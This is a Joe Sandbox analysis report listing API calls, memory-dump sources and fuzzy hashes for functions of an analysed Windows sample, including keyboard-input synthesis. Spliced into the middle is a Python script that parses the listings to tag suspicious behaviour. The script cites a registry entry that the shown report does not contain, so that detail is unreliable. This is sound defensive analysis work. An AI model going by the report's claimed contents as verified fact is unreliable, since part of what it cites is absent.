                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3257027151-0
                                                                                              • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                              • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                              • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                              • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                              APIs
                                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastselect
                                                                                              • String ID:
                                                                                              • API String ID: 215497628-0
                                                                                              • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                              • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                              • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                              • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0044443B
                                                                                              • GetKeyboardState.USER32(?), ref: 00444450
                                                                                              • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                              • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                              • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                              • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 00444633
                                                                                              • GetKeyboardState.USER32(?), ref: 00444648
                                                                                              • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                              • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                              • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                              • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
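The two functions above (0x0044443B and 0x00444633) read and rewrite the keyboard state and then post WM_KEYUP (0x101) and WM_KEYDOWN (0x100) for VK_SHIFT (0x10), VK_CONTROL (0x11), VK_MENU (0x12) and VK_LWIN (0x5B) to a parent window, and the function at 0x0046B3A6 walks the values under a key it opens on a registry handle obtained through RegConnectRegistryW. The Python below is an added example, not part of the Joe Sandbox report: it parses API lines in the format this report prints and tags those two behaviours for triage. The tag names and the argument-position checks are the example's own assumptions; the Win32 constants are the documented values from winuser.h, and the sample listings are copied from the entries above.

```python
"""Parse the per-function API listings of a Joe Sandbox report and tag the
behaviours a triager looks for. Added example; not part of the report."""
import re
from dataclasses import dataclass
from typing import Optional

# Win32 constants from winuser.h; the report prints them as raw hex arguments.
WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
KEY_MESSAGE_APIS = {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}

# One API line, in the three shapes the report uses:
#   • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
#   • _wcslen.LIBCMT ref: 0047A79E
#   • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    func: str
    module: str
    args: list                     # int per argument, None where the report shows '?'
    ref: int                       # call-site address
    subcall: Optional[int] = None  # callee address when the line is a subcall entry


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)   # also handles '-00000001'


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = [_parse_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
    return ApiCall(m["func"], m["mod"], args, int(m["ref"], 16),
                   int(m["sub"], 16) if m["sub"] else None)


def parse_listing(text: str) -> list:
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]


def posted_keys(calls: list) -> list:
    """(message, virtual key) pairs for every WM_KEYDOWN/WM_KEYUP posted or sent."""
    keys = []
    for c in calls:
        if c.func in KEY_MESSAGE_APIS and len(c.args) >= 3 and c.args[1] in (WM_KEYDOWN, WM_KEYUP):
            vk = c.args[2]
            name = "?" if vk is None else VK_NAMES.get(vk, f"VK_{vk:02X}")
            keys.append(("WM_KEYDOWN" if c.args[1] == WM_KEYDOWN else "WM_KEYUP", name))
    return keys


def triage(calls: list) -> dict:
    """Tag one function's own calls; subcall lines are context, not its behaviour."""
    funcs = {c.func for c in calls if c.subcall is None}
    tags = set()
    keys = posted_keys(calls)
    # Rewriting the keyboard state and then posting modifier up/down messages to a
    # window is how a program synthesizes key input into another application.
    if keys and "SetKeyboardState" in funcs:
        tags.add("synthesized_keyboard_input")
    # RegOpenKeyExW followed by RegEnumValueW walks every value under a key;
    # RegConnectRegistryW first selects the machine (NULL name = local) whose registry is read.
    if {"RegOpenKeyExW", "RegEnumValueW"} <= funcs:
        tags.add("registry_value_enumeration")
    return {"tags": tags, "keys": keys}


# Sample input copied from the report's function at 0x0044443B (listing above).
KEYUP_LISTING = """\
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
"""

# Sample input copied from the report's function at 0x0046B3A6 (listing above).
REGISTRY_LISTING = """\
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
"""

if __name__ == "__main__":
    for name, text in (("0x0044443B", KEYUP_LISTING), ("0x0046B3A6", REGISTRY_LISTING)):
        print(name, triage(parse_listing(text)))
```

Feed it one function entry at a time (the "APIs" block of an entry). Only a function's own calls set tags; "Part of subcall function" lines are parsed but ignored by triage, so a caller that merely invokes the key-posting routine is not itself tagged, which keeps the tags attached to the code that actually performs the behaviour.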
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2354583917-0
                                                                                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                              • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: Wu
                                                                                              • API String ID: 2449869053-4083010176
                                                                                              • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                              • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                              • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Enable$Show$MessageMoveSend
                                                                                              • String ID:
                                                                                              • API String ID: 896007046-0
                                                                                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                              • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                              • GetFocus.USER32 ref: 00448ACF
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Enable$Show$FocusMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3429747543-0
                                                                                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                              • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                              • __swprintf.LIBCMT ref: 0045D4E9
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                              • String ID: %lu$\VH
                                                                                              • API String ID: 3164766367-2432546070
                                                                                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                              • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 3850602802-3636473452
                                                                                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                              • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                              • String ID:
                                                                                              • API String ID: 3985565216-0
                                                                                              • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                              • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                              • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                              • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0041F707
                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                              • _free.LIBCMT ref: 0041F71A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
